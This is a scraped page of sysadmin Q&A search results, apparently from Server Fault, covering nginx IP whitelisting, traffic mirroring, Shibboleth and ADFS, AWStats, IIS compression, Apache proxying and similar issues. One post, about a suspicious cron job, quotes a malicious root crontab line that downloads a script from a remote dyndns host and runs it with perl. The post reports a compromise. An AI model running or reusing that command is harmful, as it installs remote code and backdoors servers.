Search Results

Search found 86974 results on 3479 pages for 'visualsvn server'.


  • Nginx IP whitelist

    - by Will
    Is it possible to create an IP whitelist for my nginx proxy server without adding allow or deny entries in the config file? Ideally nginx would check a separate database to decide whether a visitor is allowed to access the website, or at minimum read a list of allowed IPs from a file on the same server, so I can easily update the list without restarting nginx every time. In the future I would like to tie this into my website: a user will log in, their IP will be linked to their account, and they will be able to update it when it changes so they keep access. So it would be easier if I had the list of allowed IPs in some kind of external database. Any help is appreciated.
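
    A minimal sketch of one way to get most of this without touching the main config on every change: keep the whitelist in a separate include file that a script (or, later, the web application) regenerates from the database, and reload nginx rather than restarting it. File names and addresses below are hypothetical; for a true per-request database lookup, the auth_request module pointing at a small internal service is another option if your build includes it.

        # /etc/nginx/conf.d/whitelist.conf (http context; regenerated from the database)
        geo $ip_allowed {
            default          0;
            203.0.113.10     1;    # example allowed client
            198.51.100.0/24  1;    # example allowed range
        }

        # in the server/location block that proxies the site:
        if ($ip_allowed = 0) {
            return 403;
        }

        # after rewriting whitelist.conf, pick it up without dropping connections:
        # nginx -s reload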

    Read the article

  • Is there a network "tee"-alike with one leg returning to /dev/null ?

    - by Steff Davies
    I've just built a new PostgreSQL server for my employers, which is happily replicating using WALs. I'm now left with the problem of verifying its performance. One nice way which came up in conversation is to break replication with the slave caught up and then direct all production traffic to both servers, discarding the responses from the new server and returning those from the current one to the clients. Once we're sure performance is OK, we re-sync the slave and can fail over with confidence. Bliss. This would require a TCP proxy capable of opening two outgoing connections for each incoming one, and discarding the data returned from one of them, which is a tricky thing to google for, it seems. Do the assembled brains know of such a thing, before I dive into libevent and write one?
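
    For a quick prototype (one connection at a time, definitely not a production proxy), a netcat/tee pipeline can duplicate the client's traffic to a second backend and throw that backend's replies away. Hostnames and the port are placeholders, and this assumes bash process substitution plus an OpenBSD-style netcat; anything serious would still need a proper connection-aware proxy along the libevent lines mentioned above.

        mkfifo /tmp/backpipe
        nc -l 5432 < /tmp/backpipe \
          | tee >(nc shadow-db 5432 > /dev/null) \
          | nc primary-db 5432 > /tmp/backpipe
        # traditional netcat wants "nc -l -p 5432" for the listener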

    Read the article

  • Need to get a list of all users within a subnet of servers

    - by mikedopp
    I am looking to write a batch or VBS script to gather all users (local to the server, i.e. administrators or other local accounts, not AD users) on a collection of servers inside my network. I assume I could do this by subnet. I could even put the server names into a CSV/text file for the script to read from and report back to. Lots to ask. I would use net user, however I run into local access only. Ideas? Or are there too many security walls for this to work?
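
    If WMI is reachable on those servers, one hedged shortcut before writing a full script is a single wmic call driven by a text file of server names (the file names below are examples, and the account running it needs admin rights on each box):

        rem servers.txt holds one hostname per line
        wmic /node:@servers.txt /output:localusers.csv useraccount where "LocalAccount='TRUE'" get Name,Disabled,SID /format:csv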

    Read the article

  • Shibboleth + IIS and Pound Reverse Proxy

    - by boburob
    Having a bit of a problem getting Shibboleth (SSO) working with ADFS and Pound. The main problem seems to be that: The website address will be https://website.domain.com Pound will then terminate the SSL and forward the traffic to the webserver on a different port (http://server.domain.com:8888) I have set up Shibboleth to protect the address http://server.domain.com:8888, which allows me to retrieve metadata and it all seems to be working fine. However, the problem seems to be that ADFS is configured to protect the https website, so when Shibboleth attempts to receive information from ADFS I get nothing except the following error: A token request was received for a relying party identified by the key 'https://msstagrevproxy.cwpintranet.com/shibboleth', but the request could not be fulfilled because the key does not identify any known relying party trust. Key: https://msstagrevproxy.cwpintranet.com/shibboleth I am not really sure how I can work around this, as to retrieve the metadata from Shibboleth I have to use the https address, but that address does not actually exist in Shibboleth or IIS. Has anyone had any experience with this before, or with using any other SSO behind a reverse proxy that works?
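
    One hedged thing to check, going only by the error text: ADFS looks up the relying-party trust by the SP's entityID, and here that ID is being derived from the proxied host name. Pinning the entityID in shibboleth2.xml to whatever identifier the ADFS relying-party trust was actually created with (typically the public https name) is the usual reconciliation; the value below is just the public address from the question:

        <ApplicationDefaults entityID="https://website.domain.com/shibboleth"
                             REMOTE_USER="eppn persistent-id targeted-id">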

    Read the article

  • Redirecting to a folder

    - by RN
    Apache 2, Plesk 9.x. I have a website www.example.com and my blog is at www.example.com/blog. I have no content on www.example.com as of now, so I want all requests for example.com to be redirected to www.example.com/blog. How should I do that? Is this something I can do in Apache? I am using the GoDaddy DNS server. Not sure if it matters, but I have multiple domains hosted on the same server, and I am using Plesk to manage my virtual hosts.
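
    This is normally done in Apache itself rather than in DNS. A minimal sketch, assuming the directive goes into the domain's vhost (in Plesk that usually means a vhost.conf include for the domain) and mod_alias is loaded:

        # send only requests for the site root to the blog
        RedirectMatch permanent ^/$ http://www.example.com/blog/

    The same thing with mod_rewrite, if that is already in use, would be RewriteRule ^/?$ /blog/ [R=301,L].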

    Read the article

  • new vhost - main host AWstats

    - by vn
    Hi, I just began working at this new job and I have to configure a new host for stats with AWStats. I once used AWStats on my own server, no biggie. Now I'm on a multi-site server with the access_log files nicely split per site. I copied an awstats.conf file from one of the sites that already has (working) stats. I changed the LogFile and SiteDomain values as described at http://awstats.sourceforge.net/docs/awstats_setup.html#BUILD_UPDATE, saved the conf and ran the commands perl awstats.pl -config=mysite -update and perl awstats.pl -config=mysite -output -staticlinks awstats.mysite.html (yes, I changed these with my own info...). PROBLEM IS: whenever I try to access the html file or the dynamic page (with the config option on awstats.pl like my working site does), I get the stats of the MAIN site from access.log itself (and not access_log-mysite), judging from the title at the top of the page and the hostname on the left tab (stats for mysite.com)... What did I do wrong? There are no errors from what I see... Thanks a lot for any help
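
    For reference, AWStats picks the per-site config purely from the -config value, so a hedged checklist for this symptom (paths and names below are examples): the copied file must be saved as awstats.mysite.conf in a directory AWStats searches (e.g. /etc/awstats), it must not still carry the main site's name, and its LogFile must point at the split log rather than access.log:

        # /etc/awstats/awstats.mysite.conf  (name must match -config=mysite)
        LogFile="/var/log/httpd/access_log-mysite"
        SiteDomain="mysite.com"
        HostAliases="mysite.com www.mysite.com"

    If the dynamic page is used, the URL also needs config=mysite, otherwise it will happily show another site's data.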

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?
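
    Beyond deleting the entry, a few hedged first steps (standard CentOS commands; paths may vary) are to find every place that references the job or that domain, see whose crontab it landed in, and look for packaged files that have been altered:

        grep -r "eventuallydown" /etc/cron* /var/spool/cron /etc/rc.d 2>/dev/null
        crontab -l -u root
        rpm -Va | grep -E '^..5'    # packaged files whose checksums no longer match
        last -20                    # recent logins worth explaining

    If anything there cannot be accounted for, treating the box as compromised (rebuild, rotate credentials) is the safer course than just removing the cron line.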

    Read the article

  • How to restore from file using Symantec NetBackup 7.5

    - by Tony
    I have an install of Symantec NetBackup 7.5 and I want to restore the server from a NetBackup image file. The file was created using NetBackup before I arrived. We had a hardware failure that corrupted this server and it needed to be rebuilt, now we want to restore from this image file. I can't for the life of me figure out how to restore from that file. I've installed the NetBackup application but it can't find the file when using the restore command within the application. If I double-click the file it opens the application then gives me the same "can't find any NetBackup files" error. I also can't simply drag the file into the NetBackup window. Any advice on how I restore from this file would be appreciated, thank you.

    Read the article

  • HD latency measurement using bonnie++ on different machines with different RAM size

    - by j0nes
    Hello, I have run bonnie++ v1.96 on two different servers without any additional load. One server is a "physical" Dell server with 32 GB RAM, the other is a virtual instance with 14 GB RAM. I have read in the bonnie++ manual that I should use twice the size of RAM for my bonnie++ runs, so I used 64 GB on the physical machine and 28 GB on the virtual machine. Now I want to compare the results, and I am wondering whether they are comparable at all. The most interesting part is the latency: on the physical machine, the values are about 10 times higher than on the virtual machine! Can I take these results seriously (i.e. the virtual machine's disk really is that much faster), or does the different RAM size skew the results? Thanks! Jonas
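
    One hedged way to make the runs more comparable is to fix the same absolute file size on both machines (large enough to blow well past the bigger machine's cache) instead of scaling it to each box's RAM, for example:

        # identical dataset on both boxes; -m only labels the output
        bonnie++ -d /mnt/bonnie -s 64g -u nobody -m physical-box
        bonnie++ -d /mnt/bonnie -s 64g -u nobody -m virtual-box

    With different file sizes the two machines are not doing the same work (seek distances and cache hit rates differ), so part of the latency gap may be an artifact of the test rather than of the hardware.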

    Read the article

  • Is there a command line two-factor authentication verification code generator?

    - by dan
    I manage a server with two-factor authentication. I have to use the Google Authenticator iPhone app to get the 6-digit verification code to enter after entering the normal server password. The setup is described here: http://www.mnxsolutions.com/security/two-factor-ssh-with-google-authenticator.html I would like a way to get the verification code using just my laptop and not from my iphone. There must be a way to seed a command line app that generates these verification codes and gives you the code for the current 30-second window. Is there a program that can do this?
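
    There is a standard command-line tool for this: oathtool from the oath-toolkit package generates TOTP codes from the same base32 secret that was scanned into the phone (the secret below is a placeholder, and the laptop's clock must be in sync for the 30-second windows to line up):

        # Debian/Ubuntu: apt-get install oathtool    RHEL/CentOS (EPEL): yum install oathtool
        oathtool --totp -b "JBSWY3DPEHPK3PXP"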

    Read the article

  • Configure Windows Routes for VPN

    - by Florin Sabau
    I have a Virtual PC/VMware machine that runs Windows Server 2003. This virtual machine uses an IPSec VPN client program to connect to a remote network. I configured the virtual machine with two NICs: a NAT adapter, used by the VPN client to access the remote network, and a host-only adapter, used to reach the virtual machine from the host. The reason I have this setup is because I want to be able to access some remote network from the host machine. I could have installed the VPN client on the host machine, but the host runs Windows 7 and the client doesn't support it. The problem: although the virtual machine is normally reachable (ping + http access), as soon as the VPN client is started, neither of the NIC addresses is reachable any more. I'm wondering if it is a routing problem that needs to be addressed? How do routing and the VPN client connection affect the ability of the server to respond to client requests from the host?
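
    It usually is a routing (or client policy) problem: many IPSec clients install a default route into the tunnel, or enforce a "block local LAN" policy, when they connect, so replies to the host-only network get swallowed. If the client permits split tunnelling, a hedged workaround is a persistent static route inside the VM for the host-only subnet; the addresses below are only an example and should match your host-only network:

        rem 192.168.56.0/24 = host-only network, 192.168.56.101 = this VM's host-only address
        route -p add 192.168.56.0 mask 255.255.255.0 192.168.56.101 metric 1

    If the client enforces a local-LAN block in its policy, no route will help and that setting has to be relaxed in the VPN profile instead.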

    Read the article

  • Locally redirect Domain1.com to Domain2.com/subdir on one computer

    - by Werner
    I am running a FreeBSD server and I want to redirect a specific website domain to another domain including subdirectory. I want to bypass that domain to alter the XML results it returns. I tried the hosts file solution, but that way I can only redirect to an IP address without subdir. So that's no solution. Is there another way to solve this? Installing something on the server if needed is not a problem. Unless it's a heavy program.
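
    Since the hosts file can only map a name to an address, the usual trick is to point that name at the FreeBSD box itself and run a small reverse proxy there that adds the subdirectory. A hypothetical nginx sketch (domains are placeholders, and it only covers plain http; an https upstream needs a little more care):

        server {
            listen 80;
            server_name domain1.com;
            location / {
                # /foo on domain1.com is fetched from domain2.com/subdir/foo
                proxy_pass http://domain2.com/subdir/;
            }
        }

    That also gives a natural place to rewrite the XML on the way through (e.g. with the sub_filter module) if altering the results is the end goal.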

    Read the article

  • 'Internet Explorer cannot display the webpage'.

    - by BulletProof
    The URL (http://mts.varicentondemand.com) is correct; it worked the other day. The URL pointing at the DB server and the database name were edited this morning in the 'jdbc.properties' file and are correct, so nothing is wrong with the pointers in that sense. To pick up the changes, Apache Tomcat 6 was restarted. Everything should work, but the page is not coming up. I tried the URL from a local machine as well as from the web/app server itself. Where should I check for clues?
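
    A few generic places to look, sketched for a Unix-style Tomcat 6 layout (adjust the paths, or use the Tomcat logs folder and netstat -ano on Windows): whether Tomcat actually finished starting after the restart, whether its connector is listening, and whether the app answers locally with the new jdbc.properties:

        tail -n 100 /usr/local/tomcat/logs/catalina.out   # startup stack traces, bad JDBC URL, etc.
        netstat -an | grep 8080                           # is the connector port listening?
        curl -v http://localhost:8080/                    # does the app answer when DNS and proxies are bypassed?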

    Read the article

  • Should a sysadmin contractor charge overtime for off-peak hours?

    - by Jakobud
    This is not necessarily a server-related question, but more of a system admin question that I think will relate to many on SF. I'm doing sysadmin/IT consulting for a small company. I only work about 3 days a week for them on average. If a server goes down or something like that during off hours (nights, weekends, 3am, etc.) and they need it fixed during those time periods, should I be charging overtime for that? Or would I not be justified in charging overtime until I've logged 40 hours for the week? Perhaps calling it overtime isn't the best name; maybe it's better to call it an off-peak hourly rate. Anyway, I was just curious what other consultants do in these circumstances.

    Read the article

  • nginx is not using gzip to talk to backend servers

    - by Michael Gorsuch
    Our web servers are running IIS 7 and are configured to compress dynamic and static content. When I hit these servers directly, gzip compression works. I recently placed nginx in front of them, and gzip compression has stopped. I was able to work around this by explicitly enabling gzip compression on nginx itself, but that seems a little inefficient considering I have half a dozen backends and only one active nginx box. It appears that nginx is stripping out the Accept-Encoding header. Does anyone have any advice for how to 'correct' this behavior? A sample configuration:

        upstream backend {
            server 127.0.0.1:8080;
        }

        server {
            listen 80;
            proxy_set_header Host $host;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            location / {
                proxy_pass http://backend;
            }
        }
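
    A hedged note on the likely cause: by default nginx proxies to the upstream as HTTP/1.0, and IIS skips compression for HTTP/1.0 (and proxied) requests unless noCompressionForHttp10 / noCompressionForProxies are turned off in its httpCompression settings, so the missing header may not be the whole story. On the nginx side the corresponding knobs would look roughly like this (proxy_http_version needs nginx 1.1.4 or newer):

        location / {
            proxy_pass http://backend;
            proxy_http_version 1.1;
            proxy_set_header Accept-Encoding $http_accept_encoding;
        }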

    Read the article

  • Join domain in Windows 7 [on hold]

    - by Hassan Ali Khan
    I have created a domain on a server machine, and I am trying to join that domain from another machine running Windows 7 through the following steps: go to My Computer Properties - Change settings - Computer Name - click the Change button - select the "Domain" radio button and enter the domain name. After that, when I click OK and enter the username and password credentials, it shows me the following error: An attempt to resolve the DNS name of a domain controller in the domain being joined has failed. Please verify this client is configured to reach a DNS server that can resolve DNS names in the target domain
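
    That error almost always means the Windows 7 client is not using the domain controller (or another DNS server that holds the AD zone) for name resolution. A hedged fix, with the adapter name and DC address as placeholders: point the client's DNS at the DC, flush the cache, and confirm the domain's locator records resolve before retrying the join:

        netsh interface ip set dns name="Local Area Connection" static 192.168.1.10
        ipconfig /flushdns
        nslookup -type=SRV _ldap._tcp.dc._msdcs.yourdomain.local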

    Read the article

  • How to establish SIP connection, when SIP-proxy is required?

    - by LA_
    I have Asterisk/1.8.13.1 Asterisk GUI-version : SVN--r Yes, quite an old one, but I cannot update it since it is installed on my Synology NAS. The NAS is connected to the internet through an Asus RT-N16 router. I should use the following data to connect to the server: Auth name – 7499952XXXX User name/User ID/Display Name – nickname Authorization user name - [email protected] Domain - sip.beeline.ru SIP proxy server - msk.sip.beeline.ru I've also found the following string: [email protected]:password:[email protected]@msk.sip.beeline.ru:5060/7499952XXXX I've tested these parameters on my PC through X-Lite and it works well (so I assume there is no problem with the router and no need to touch its NAT settings). But since I am quite new to Asterisk, I cannot work out where to enter all these data. The Asterisk GUI doesn't have fields for a proxy: Can somebody please help me with step-by-step instructions? Thank you in advance!
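
    In Asterisk 1.8 the proxy setting is not exposed in the GUI but can go straight into sip.conf; a hedged sketch built from the values in the question (the exact auth-user form and the secret are placeholders, and outboundproxy is supported by chan_sip in 1.8):

        [general]
        register => 7499952XXXX:[email protected]/7499952XXXX

        [beeline]
        type=peer
        host=sip.beeline.ru
        defaultuser=7499952XXXX
        fromuser=7499952XXXX
        fromdomain=sip.beeline.ru
        outboundproxy=msk.sip.beeline.ru
        secret=yourpassword
        qualify=yes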

    Read the article

  • Apache won't serve images larger than ~2K

    - by dtbaker
    Hello, Just upgraded an old box to Ubuntu to 10.04.2 LTS. Apache will not display images to a browser that are over about 2K. Small images seem to display fine. Static HTML and PHP continues to works fine as well. Installed: apache2 2.2.14-5ubuntu8.4 apache2-mpm-prefork 2.2.14-5ubuntu8.4 apache2-utils 2.2.14-5ubuntu8.4 apache2.2-bin 2.2.14-5ubuntu8.4 apache2.2-common 2.2.14-5ubuntu8.4 here is an ngrep of an image that doesn't display fine in the browser: T 192.168.0.4:32907 - 192.168.0.54:80 [AP] GET /path/path/logo.png HTTP/1.1..Host: 192.1 68.0.54..Connection: keep-alive..Accept: application/xml,application/xhtml+ xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5..User-Ag ent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13..Accept-Enco ding: gzip,deflate,sdch..Accept-Language: en-US,en;q=0.8..Accept- Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3.... T 192.168.0.54:80 - 192.168.0.4:32907 [A] HTTP/1.1 200 OK..Date: Wed, 09 Mar 2011 05:28:38 GMT..Server: Apa che/2.2.14 (Ubuntu)..Last-Modified: Tue, 05 Oct 2010 11:59:17 GMT ..ETag: "17b6f4-15fe-491dd63eb2f40"..Accept-Ranges: bytes..Conten t-Length: 5630..Keep-Alive: timeout=15, max=100..Connection: Keep -Alive..Content-Type: image/png.....PNG........IHDR...!...v...... .%.....sRGB.........bKGD..............pHYs.................tIME.. etc... This looks ok to me! I have tried firefox and chrome, both display small images fine but when a large image is requested the browser prompts to download the file. When the image file is saved to the local computer it is corrupt, it also takes a long time to save which makes me think the browser cannot see the content-length header sent from apache. Also when I look at the saved image file it includes the headers from apache, along with a bit of garbage at the top, like so: vi logo.png: ^@^UÅd^@$^]V^S^H^@E^@^Q,n!@^@@^F^@^@À¨^@6À¨^@^D^@P^Y¬rÇŹéw^P^@Ú^@^@^A^A^H ^@^GÝ^]^@pbSHTTP/1.1 200 OK^M Date: Wed, 09 Mar 2011 04:47:04 GMT^M Server: Apache/2.2.14 (Ubuntu)^M Last-Modified: Tue, 05 Oct 2010 11:59:17 GMT^M ETag: "17b6ff-157c-491dd63eb2f40"^M Accept-Ranges: bytes^M Content-Length: 5500^M Keep-Alive: timeout=15, max=94^M Connection: Keep-Alive^M Content-Type: image/png^M ^M PNG^M etc... Any ideas? It's driving me nuts. There is nothing in apache error logs, and permissions are fine (because the image data is there, it's just somewhat corrupt). There's no proxy or iptables on this ubuntu box either. Thanks heaps!! Dave ps: just tried on IE from a different computer, same problem :( pps: rebooted server, no help.
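
    The symptom pattern here (tiny files fine, anything larger than roughly one TCP segment truncated or corrupted, HTTP headers embedded in the saved file) is classically caused by sendfile()/mmap interacting badly with flaky NIC offloading, virtualised NICs or network filesystems. A hedged first thing to try in the Apache config on this Ubuntu box, followed by a reload, is to make Apache fall back to plain reads:

        # /etc/apache2/apache2.conf (or the vhost)
        EnableSendfile Off
        EnableMMAP Off

    If that cures it, the underlying cause is usually the NIC driver or checksum/TSO offloading (ethtool -K can toggle those) rather than Apache itself.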

    Read the article

  • Copy files between two Windows machines on separate domains

    - by Simon
    I need to copy several database backups between two computers. The source computer initiates the copy and is a Windows 2000 pc and is a member of domain1. The destination machine is running Windows Server 2000 and is a member of domain2. The machines are on separate networks physically connected via a firewall. The files are currently copied via ssh with http://sshwindows.sourceforge.net/ installed on the destination machine. There is no need to encrypt the contents during the copy, however the passwords should not be sent in the clear. I am looking for a way to copy the files without having to install a server on the destination. I specifically need help with how to set up the permissions and what ports would need to be opened on the firewall.
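
    Given that only a file-share port needs to be open through the firewall (TCP 445, or 139 for older SMB), a hedged sketch using built-in tools and explicit credentials, with share, path and account names as placeholders (robocopy is a Resource Kit download on Windows 2000; xcopy works too):

        rem authenticate to the destination with a domain2 account; * prompts for the password instead of storing it
        net use \\destserver.domain2.local\Backups /user:DOMAIN2\svc-backup *
        robocopy D:\SQLBackups \\destserver.domain2.local\Backups *.bak /Z /R:3 /W:10
        net use \\destserver.domain2.local\Backups /delete

    NTLM authentication over SMB does not send the password in the clear, which appears to be the only hard requirement here, and nothing has to be installed on the destination.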

    Read the article

  • periodically overriding NTP for simulation purposes

    - by Gerard
    I have this situation: NTP is used to sync time on a set of Windows 7 and Server 2008 machines. Nothing out of the ordinary about this. Periodically on this system, the time needs to be changed for testing/training purposes (it is a training simulation system that has a lot of time-dependent operations). My question: as NTP in general does not really like big time jumps or changes AFAIK, is there a standard way this could be set up to allow the clock to be changed at the root NTP server in the system and have it propagate through the system in a reasonable amount of time (a minute or two)? It is not acceptable to disable and/or restart all NTP client services to achieve this. Any ideas? It would be nice to do this without writing some kind of custom script to disable services and update clocks all over the place. Thanks in advance.
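
    On Windows 7 / Server 2008 the clients sync through the Windows Time service, and (as a hedged sketch, not a guarantee for every domain setup) a large jump at the root can be pushed out without restarting anything by widening the allowed correction once, then forcing the clients to poll after the root clock is changed:

        rem allow arbitrarily large corrections (the defaults cap how far w32time will step)
        reg add HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Config /v MaxPosPhaseCorrection /t REG_DWORD /d 0xFFFFFFFF /f
        reg add HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Config /v MaxNegPhaseCorrection /t REG_DWORD /d 0xFFFFFFFF /f
        w32tm /config /update

        rem after the root server's clock has been changed, on each client:
        w32tm /resync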

    Read the article

  • Re-deploy only the reports on SCOM Management Packs

    - by Gabriel Guimarães
    I've migrated Reporting Services on a SCOM 2007 R2 install and noticed that the reports have not been copied. I can create a new report, but the ones I had from the management packs are gone. I've tried re-applying the Management Packs, however that doesn't re-deploy them, and when I try to access, for example: Monitoring - Microsoft Windows Print Server - Microsoft Windows Server 2000 and 2003 Print Services - State View - select any item and click Alerts on the right menu, I get the following error: Date: 12/24/2010 12:40:35 PM Application: System Center Operations Manager 2007 R2 Application Version: 6.1.7221.0 Severity: Error Message: Cannot initialize report. Microsoft.Reporting.WinForms.ReportServerException: The item '/Microsoft.SystemCenter.DataWarehouse.Report.Library/Microsoft.SystemCenter.DataWarehouse.Report.Alert' cannot be found. (rsItemNotFound) at Microsoft.Reporting.WinForms.ServerReport.GetExecutionInfo() at Microsoft.Reporting.WinForms.ServerReport.GetParameters() at Microsoft.EnterpriseManagement.Mom.Internal.UI.Reporting.Parameters.ReportParameterBlock.Initialize(ServerReport serverReport) at Microsoft.EnterpriseManagement.Mom.Internal.UI.Console.ReportForm.SetReportJob(Object sender, ConsoleJobEventArgs args) The report doesn't exist on the Reporting Services side. How do I re-deploy these reports? Thanks in advance.

    Read the article

  • Executed PHP files are stale until "touched" (Symlinked NFS mount as web root)

    - by mmattax
    We have a PHP application served by 3 web servers (running Nginx and Apache). The web servers' directory roots are symlinked directories that point to an NFS mount. For example: web01 has an NFS mount at /data/webapp, which is symlinked to /home/webapp. Apache serves content from /home/webapp/www. We also use APC for our PHP opcode cache. When we deploy code, we SCP an archive file to the NFS server and extract it. Since upgrading to RedHat 6, when we deploy our code the web servers execute "stale" PHP files until touch is run on the PHP files. We thought that APC might be causing the problem, but the issue exists even after clearing the opcode cache. Any ideas on how to diagnose why the stale PHP code is being executed?
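
    Two caches sit between the deployed file and the executed code here, and either can go stale over NFS: the NFS client's attribute cache (mtimes can look unchanged for a while) and PHP's stat/realpath caching (APC only recompiles when it sees a new mtime), which is also why touch "fixes" it. A hedged pair of knobs to experiment with, values and paths being examples only:

        # fstab on the web servers: tighten NFS attribute caching for the app export
        nfsserver:/data/webapp  /data/webapp  nfs  rw,actimeo=1  0 0

        ; php.ini: make APC stat files and keep the realpath cache short-lived
        apc.stat = 1
        realpath_cache_ttl = 2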

    Read the article

  • Nginx request forking

    - by Adam
    Hi, I'm wondering if nginx can "fork" a request. Let's imagine this config:

        upstream backend {
            server localhost:8080;
            # ... more servers here
        }

        server {
            location /myloc {
                FORK-REQUEST http://my-other-url:3135/something;
                proxy_pass http://backend;
            }
        }

    I would like nginx to send a copy of the request to the URL specified by FORK-REQUEST and after that to load-balance it across the backend servers and return that response to the client. As I don't need the response from FORK-REQUEST, it would be best if this request were async so normal processing doesn't have to wait. Is a scenario like this possible?
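
    There is no FORK-REQUEST directive, but nginx 1.13.4 and later ship a mirror module that does essentially this: the mirrored subrequest's response is discarded and only the real upstream's response goes back to the client. A hedged sketch using the URL from the question (on older builds, the undocumented post_action directive was the usual workaround):

        location /myloc {
            mirror /fork;
            proxy_pass http://backend;
        }

        location = /fork {
            internal;
            proxy_pass http://my-other-url:3135/something;
        }

    One caveat: nginx does not release the client connection until the mirror subrequest finishes, so a slow mirror target still needs short proxy timeouts to stay out of the way.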

    Read the article

  • Apache ProxyPass ignore static files

    - by virtualeyes
    Having an issue with an Apache front server connecting to a Jetty application server. I thought that ProxyPass ! in a location block was supposed to NOT pass processing on to the application server, but for some reason that is not happening in my case; Jetty shows a 404 on the missing statics (js, css, etc.). Here's my Apache (v2.4, BTW) virtual host block:

        DocumentRoot /path/to/foo
        ServerName foo.com
        ServerAdmin [email protected]
        RewriteEngine On

        <Directory /path/to/foo>
            AllowOverride None
            Require all granted
        </Directory>

        ProxyRequests Off
        ProxyVia Off
        ProxyPreserveHost On

        <Proxy *>
            AddDefaultCharset off
            Order deny,allow
            Allow from all
        </Proxy>

        # don't pass through requests for statics (image, js, css, etc.)
        <Location /static/>
            ProxyPass !
        </Location>

        <Location />
            ProxyPass http://localhost:8081/
            ProxyPassReverse http://localhost:8081/
            SetEnv proxy-sendchunks 1
        </Location>
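
    For what it's worth, the mod_proxy docs handle exclusions by ordering plain ProxyPass directives rather than Location blocks: the exclusion has to be matched before the catch-all mapping. A hedged equivalent using the paths from the question (and note the static files must actually exist under /path/to/foo/static for Apache to have anything to serve):

        ProxyPass /static/ !
        ProxyPass / http://localhost:8081/
        ProxyPassReverse / http://localhost:8081/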

    Read the article
